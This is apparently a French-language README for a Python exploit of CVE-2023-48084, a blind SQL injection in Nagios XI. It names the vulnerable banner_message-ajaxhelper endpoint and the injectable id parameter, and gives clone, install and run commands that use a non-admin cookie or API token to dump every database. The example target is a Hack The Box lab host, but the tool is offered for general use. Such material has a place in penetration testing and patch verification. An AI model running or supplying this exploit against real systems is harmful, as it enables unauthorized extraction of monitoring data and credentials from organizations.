
Programme Python pour dumper toutes les bases de données, en exploitant la vulnérabilité sqli de NagiosXI.
Exploit Python pour la CVE-2023-48084 -> Nagios XI before version 5.11.3 was discovered to contain a SQL injection vulnerability via the bulk modification tool.
L'exploit utilise /admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=(<SQL COMMAND TO EXECUTE>) pour exécuter des requêtes SQL, et exploite une injection SQL aveugle...
Clonez le dépôt et installez le fichier requirements.txt
git clone https://github.com/Hamibubu/CVE-2023-48084.git
cd CVE-2023-48084
pip install -r requirements.txt
Exécutez maintenant le programme, vous avez besoin d'un cookie de session non-admin, ou d'un jeton API, exemple
python3 CVE-2023-48084.py --url https://monitored.htb/nagiosxi -a <token>
python3 CVE-2023-48084.py --url https://monitored.htb/nagiosxi -c <cookie>
Par défaut, il essaiera de dump toute la base de données en commençant par les schémas. Si vous voulez que ce soit plus rapide, regardez simplement le code et prenez la partie dont vous avez besoin.